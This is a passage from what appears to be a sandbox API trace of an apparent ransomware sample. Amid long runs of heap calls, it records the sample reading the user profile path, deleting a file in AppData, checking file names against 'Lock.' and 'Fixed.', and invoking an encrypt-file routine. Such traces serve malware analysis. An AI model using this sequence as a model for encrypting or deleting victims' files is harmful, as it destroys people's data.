hHeap=0x970000) returned 1 [0223.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0223.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0223.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0223.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0223.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0223.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0223.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0223.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0223.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0223.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5f8 | out: hHeap=0x970000) returned 1 [0223.313] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0223.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0223.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0223.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0223.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0223.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0223.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0223.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0223.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0223.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d40 [0223.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50da0 [0223.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ea8 [0223.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0223.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50de8 [0223.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f468 [0223.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0223.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ed8 [0223.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0223.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0223.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0223.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0223.313] CloseHandle (hObject=0x2a0) returned 1 [0223.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0223.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0223.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14818 | out: hHeap=0x970000) returned 1 [0223.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0223.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0223.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0223.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0223.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0223.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0223.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0223.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0223.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0223.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0223.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f468 | out: hHeap=0x970000) returned 1 [0223.318] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0223.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0223.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0223.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0223.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0223.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0223.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0223.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0223.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0223.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0223.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0223.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0223.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0223.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0223.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0223.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0223.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0223.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f24820 | out: hHeap=0x970000) returned 1 [0223.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0223.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0223.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f620 | out: hHeap=0x970000) returned 1 [0223.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0223.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f350 | out: hHeap=0x970000) returned 1 [0223.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0223.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0223.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0223.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f698 | out: hHeap=0x970000) returned 1 [0223.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0223.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50488 | out: hHeap=0x970000) returned 1 [0223.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0223.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f490 | out: hHeap=0x970000) returned 1 [0223.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0223.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f670 | out: hHeap=0x970000) returned 1 [0223.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0223.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f418 | out: hHeap=0x970000) returned 1 [0223.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0223.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f648 | out: hHeap=0x970000) returned 1 [0223.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0223.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3a0 | out: hHeap=0x970000) returned 1 [0223.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0223.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0223.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0223.362] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0223.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0223.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0223.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0223.362] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0223.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0223.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0223.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0223.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0223.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0223.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0223.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0223.362] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/af0Z-.flv", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\af0Z-.flv", lpFilePart=0x8cedf4*="af0Z-.flv") returned 0x29 [0223.363] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\af0Z-.flv" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\af0z-.flv")) returned 0x20 [0223.363] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\af0Z-.flv", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf757460, ftCreationTime.dwHighDateTime=0x1d5ea1b, ftLastAccessTime.dwLowDateTime=0x8c4b4d70, ftLastAccessTime.dwHighDateTime=0x1d5e21a, ftLastWriteTime.dwLowDateTime=0x8c4b4d70, ftLastWriteTime.dwHighDateTime=0x1d5e21a, nFileSizeHigh=0x0, nFileSizeLow=0x166f1, dwReserved0=0x1, dwReserved1=0x1c, cFileName="af0Z-.flv", cAlternateFileName="")) returned 0xa87050 [0223.363] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\af0Z-.flv" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\af0z-.flv")) returned 1 [0223.413] FindNextFileW (in: hFindFile=0xa87050, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf757460, ftCreationTime.dwHighDateTime=0x1d5ea1b, ftLastAccessTime.dwLowDateTime=0x8c4b4d70, ftLastAccessTime.dwHighDateTime=0x1d5e21a, ftLastWriteTime.dwLowDateTime=0x8c4b4d70, ftLastWriteTime.dwHighDateTime=0x1d5e21a, nFileSizeHigh=0x0, nFileSizeLow=0x166f1, dwReserved0=0x1, dwReserved1=0x1c, cFileName="af0Z-.flv", cAlternateFileName="")) returned 0 [0223.413] FindClose (in: hFindFile=0xa87050 | out: hFindFile=0xa87050) returned 1 [0223.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0223.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0223.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0223.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0223.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0223.414] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0223.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0223.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0223.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0223.414] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0223.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0223.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0223.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0223.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0223.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0223.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0223.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0223.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0223.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50488 | out: hHeap=0x970000) returned 1 [0223.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0223.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0223.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0223.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0223.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0223.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0223.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0223.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0223.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0223.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0223.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x54) returned 0x2e564e0 [0223.415] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/af0Z-.flv", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\af0Z-.flv", lpFilePart=0x8cf650*="af0Z-.flv") returned 0x29 [0223.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0223.415] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\af0Z-.flv" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\af0z-.flv")) returned 0xffffffff [0223.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0223.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0223.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50470 | out: hHeap=0x970000) returned 1 [0223.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0223.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50668 | out: hHeap=0x970000) returned 1 [0223.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50548 | out: hHeap=0x970000) returned 1 [0223.416] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0223.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0223.416] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0223.416] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0223.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0223.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0223.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0223.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503c8 [0223.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0223.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0223.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0223.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0223.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0223.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0223.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0223.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0223.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0223.417] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ATHv.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0223.417] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="THv.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0223.417] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Hv.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0223.417] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0223.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0223.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503c8 | out: hHeap=0x970000) returned 1 [0223.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0223.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50548 | out: hHeap=0x970000) returned 1 [0223.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50668 | out: hHeap=0x970000) returned 1 [0223.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0223.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0223.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0223.417] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0223.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0223.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0223.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0223.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0223.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0223.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0223.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0223.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0223.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0223.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0223.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0223.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0223.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0223.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0223.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0223.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0223.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0223.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0223.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x12) returned 0x2e69988 [0223.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0223.418] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ATHv.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0223.418] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="THv.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0223.418] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Hv.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0223.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0223.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0223.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503e0 [0223.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0223.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0223.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0223.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0223.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0223.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0223.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0223.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0223.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50668 | out: hHeap=0x970000) returned 1 [0223.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0223.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0223.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0223.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0223.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0223.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503e0 | out: hHeap=0x970000) returned 1 [0223.419] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0223.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04508 [0223.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0223.419] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0223.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04508 | out: hHeap=0x970000) returned 1 [0223.419] HeapFree 